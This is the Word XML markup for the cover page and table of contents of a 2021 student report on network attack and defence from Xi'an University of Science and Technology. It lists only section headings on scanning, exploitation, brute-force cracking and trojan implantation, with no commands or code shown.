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38180" w14:textId="271A73FD" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="20" w:after="62" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc486540166"/>
      <w:bookmarkStart w:id="1" w:name="_Toc486532109"/>
      <w:bookmarkStart w:id="2" w:name="_Toc486536678"/>
      <w:bookmarkStart w:id="3" w:name="_Toc486542210"/>
      <w:bookmarkStart w:id="4" w:name="_Toc486532250"/>
      <w:bookmarkStart w:id="5" w:name="_Toc486540514"/>
      <w:bookmarkStart w:id="6" w:name="_Toc486495817"/>
      <w:bookmarkStart w:id="7" w:name="_Toc486496358"/>
      <w:bookmarkStart w:id="8" w:name="_Toc486542143"/>
      <w:bookmarkStart w:id="9" w:name="_Toc486540392"/>
      <w:bookmarkStart w:id="10" w:name="_Toc486496114"/>
      <w:r w:rsidRPr="009F4A17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体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E26EB" wp14:editId="513CDDEB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5375910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>131445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="965200" cy="597535"/>
                <wp:effectExtent l="13335" t="10795" r="12065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7D2EC" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
                            <w:pPr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</w:rPr>
                              <w:t>成绩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E26EB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423.3pt;margin-top:10.35pt;width:76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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3447D2EC" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs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</w:rPr>
                        <w:t>成绩：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9A4E976" w14:textId="0437B0F7" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F4A17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D2996" wp14:editId="22365BC4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1630680</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>349250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3154680" cy="802640"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="5" name="矩形: 圆角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54680" cy="8026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</wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0F9B0895" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="00A45519" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
                            <w:pPr>
                              <w:jc w:val="right"/>
                              <w:rPr>
                                <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hAnsi="华文行楷" w:cs="华文行楷"/>
                                <w:color w:val="0C0C0C"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00A45519">
                              <w:rPr>
                                <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hAnsi="华文行楷" w:cs="华文行楷" w:hint="eastAsia"/>
                                <w:color w:val="0C0C0C"/>
                                <w:sz w:val="72"/>
                                <w:szCs w:val="72"/>
                              </w:rPr>
                              <w:t>西安科技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9D2996" id="矩形: 圆角 5" o:spid="_x0000_s1027" style="position:absolute;left:0;text-align:left;margin-left:128.4pt;margin-top:27.5pt;width:248.4pt;height:6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" filled="f" stroked="f" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0F9B0895" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="00A45519" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
                      <w:pPr>
                        <w:jc w:val="right"/>
                        <w:rPr>
                          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hAnsi="华文行楷" w:cs="华文行楷"/>
                          <w:color w:val="0C0C0C"/>
                          <w:sz w:val="72"/>
                          <w:szCs w:val="72"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A45519">
                        <w:rPr>
                          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hAnsi="华文行楷" w:cs="华文行楷" w:hint="eastAsia"/>
                          <w:color w:val="0C0C0C"/>
                          <w:sz w:val="72"/>
                          <w:szCs w:val="72"/>
                        </w:rPr>
                        <w:t>西安科技大学</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="009F4A17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53E65100" wp14:editId="68300D0C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>521335</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>316230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="783590" cy="7835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4F13C" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3070D5" w14:textId="2FD16423" w:rsidR="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc27725"/>
      <w:bookmarkStart w:id="12" w:name="_Toc486542211"/>
      <w:bookmarkStart w:id="13" w:name="_Toc486496115"/>
      <w:bookmarkStart w:id="14" w:name="_Toc486536679"/>
      <w:bookmarkStart w:id="15" w:name="_Toc486532251"/>
      <w:bookmarkStart w:id="16" w:name="_Toc486495818"/>
      <w:bookmarkStart w:id="17" w:name="_Toc486532110"/>
      <w:bookmarkStart w:id="18" w:name="_Toc486540167"/>
      <w:bookmarkStart w:id="19" w:name="_Toc486540515"/>
      <w:bookmarkStart w:id="20" w:name="_Toc486496359"/>
      <w:bookmarkStart w:id="21" w:name="_Toc486542144"/>
      <w:bookmarkStart w:id="22" w:name="_Toc486540393"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66956666" w14:textId="1A6B3CF5" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="00A45519" w:rsidP="009F4A17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 </w:t>
      </w:r>
      <w:r w:rsidR="009F4A17" w:rsidRPr="009F4A17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidR="009F4A17" w:rsidRPr="009F4A17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>攻防</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED119B3" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C864B46" w14:textId="220D34DD" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc9037"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F4A17">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>课程设计报告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26C459" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17026558" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
      <w:pPr>
        <w:spacing w:line="600" w:lineRule="exact"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F69B30" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
      <w:pPr>
        <w:spacing w:line="600" w:lineRule="exact"/>
        <w:ind w:right="-1"/>
        <w:rPr>
          <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
          <w:u w:val="singl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9"/>
        <w:gridCol w:w="2252"/>
        <w:gridCol w:w="1191"/>
        <w:gridCol w:w="2659"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F4A17" w:rsidRPr="009F4A17" w14:paraId="66F87F8D" w14:textId="77777777" w:rsidTr="006B775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AC5F71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32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7BD67E8A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b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>姓名：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14:paraId="6EC16426" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17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9F4A17">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>吴斌</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5FE9F7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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">杨坦达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39F4F3F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32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01AFE54E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b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>学号：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53FC8467" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17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 w:rsidRPr="009F4A17">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>18408020129</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01F67523" w14:textId="77777777" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F4A17">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>18411070431</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F4A17" w:rsidRPr="009F4A17" w14:paraId="540AED4F" w14:textId="77777777" w:rsidTr="006B775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423B22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b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>学院：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</w:tcPr>
          <w:p w14:paraId="15E38250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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>计算机科学与技术学院</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F4A17" w:rsidRPr="009F4A17" w14:paraId="436537CC" w14:textId="77777777" w:rsidTr="006B775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3EDD05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b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>班级：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</w:tcPr>
          <w:p w14:paraId="00B1E32F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bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>网络工程</w:t>
            </w:r>
            <w:r w:rsidRPr="009F4A17">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1801</w:t>
            </w:r>
            <w:r w:rsidRPr="009F4A17">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>班</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F4A17" w:rsidRPr="009F4A17" w14:paraId="5CDDA1A6" w14:textId="77777777" w:rsidTr="006B775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1A7005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b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>时间：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</w:tcPr>
          <w:p w14:paraId="1A4825C4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宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>2021年7月</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F4A17" w:rsidRPr="009F4A17" w14:paraId="366055AF" w14:textId="77777777" w:rsidTr="006B775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5372B56" w14:textId="57661716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32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>指导人：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</w:tcPr>
          <w:p w14:paraId="00862C5B" w14:textId="22D6B5E7" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A17">
            <w:pPr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ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>田红鹏老师</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F4A17" w:rsidRPr="009F4A17" w14:paraId="0D080F1C" w14:textId="77777777" w:rsidTr="006B7750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8F4827" w14:textId="77777777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b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>地点</w:t>
            </w:r>
            <w:r w:rsidRPr="009F4A17">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6804" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3CCFDAC2" w14:textId="695EF3EF" w:rsidR="009F4A17" w:rsidRPr="009F4A17" w:rsidRDefault="009F4A17" w:rsidP="009F4A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F4A17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>5</w:t>
            </w:r>
            <w:r w:rsidRPr="009F4A17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教</w:t>
            </w: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 xml:space="preserve"> 207</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C6BD91C" w14:textId="1F0E32CF" w:rsidR="00747D4C" w:rsidRDefault="00747D4C"/>
    <w:p w14:paraId="7EC004B0" w14:textId="2780DDCF" w:rsidR="00A45519" w:rsidRDefault="00A45519"/>
    <w:p w14:paraId="748DEA75" w14:textId="3FF91036" w:rsidR="00A45519" w:rsidRDefault="00A4551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3237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835DDE" w14:textId="28B06829" w:rsidR="00C54B87" w:rsidRPr="00E06F34" w:rsidRDefault="00DB5503" w:rsidP="00E06F34">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
            <w:rPr>
              <w:sz w:val="48"/>
              <w:szCs w:val="48"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00E06F34">
            <w:rPr>
              <w:sz w:val="48"/>
              <w:szCs w:val="48"/>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="733F978E" w14:textId="7F401D37" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="00DB5503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C54B87">
            <w:rPr>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00C54B87">
            <w:rPr>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00C54B87">
            <w:rPr>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc76889943" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1 网络扫描侦察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43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3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621A9" w14:textId="0FA4F0BD" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="008E765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44" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>原理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44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3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652FF" w14:textId="4F000BAF" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="008E765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45" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.2</w:t>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>双方软件环境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45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3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ACB1D" w14:textId="0790AF79" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="008E765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46" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.3</w:t>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>操作步骤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46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3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F0682" w14:textId="14760A74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47" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.4 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47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95D15" w14:textId="79225744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48" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.5 防守措施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48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4966A" w14:textId="3D44CC4A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49" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>1.6 再次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49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B4BA8" w14:textId="0EBB18E8" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="008E765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0" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2 漏洞利用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0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23C22" w14:textId="25B842E3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1" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.1 原理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1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99E7F" w14:textId="2D2A8931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2" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.2 双方软件环境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2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2462D" w14:textId="346CD10B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3" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.3 操作步骤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3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B1699" w14:textId="56640837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4" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.4 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4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EB4C9" w14:textId="0BB9724D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5" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.5 防守措施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5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A6E9E" w14:textId="0269EFD8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6" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2.6 再次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6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5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276F1" w14:textId="27DEF32F" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="008E765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7" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3 暴力破解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7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9E9B3" w14:textId="638BEB4C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8" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.1 原理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8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72BF3" w14:textId="1A8F219C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59" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.2 双方软件环境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59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04C3" w14:textId="554E0C41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0" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.3 操作步骤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0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96D81" w14:textId="7C7E32CC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1" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.4 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1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ABE56" w14:textId="55617FD3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2" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.5 防守措施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2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4C63A" w14:textId="7199CA2E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3" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>3.6 再次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3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588DE" w14:textId="6DB45732" w:rsidR="00E06F34" w:rsidRPr="00E06F34" w:rsidRDefault="008E765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4" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>4 木马植入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4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98C6" w14:textId="3B2CA63A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5" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>4.1 原理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5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19B86" w14:textId="65DC81AC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6" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>4.2 双方软件环境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6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85B57" w14:textId="56F3C424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7" w:history="1">
            <w:r w:rsidR="00E06F34" w:rsidRPr="00E06F34">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>4.3 操作步骤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7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F584" w14:textId="18B4FAD4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8" w:history="1">
